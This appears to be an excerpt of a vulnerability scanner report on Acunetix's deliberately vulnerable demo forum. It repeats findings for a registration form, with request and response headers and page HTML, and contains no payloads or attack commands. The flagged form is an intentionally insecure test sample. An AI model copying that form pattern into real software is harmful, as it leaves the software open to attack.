<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=70 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=71 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=72 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=73 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=74 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=75 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=76 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 HTTP/1.1
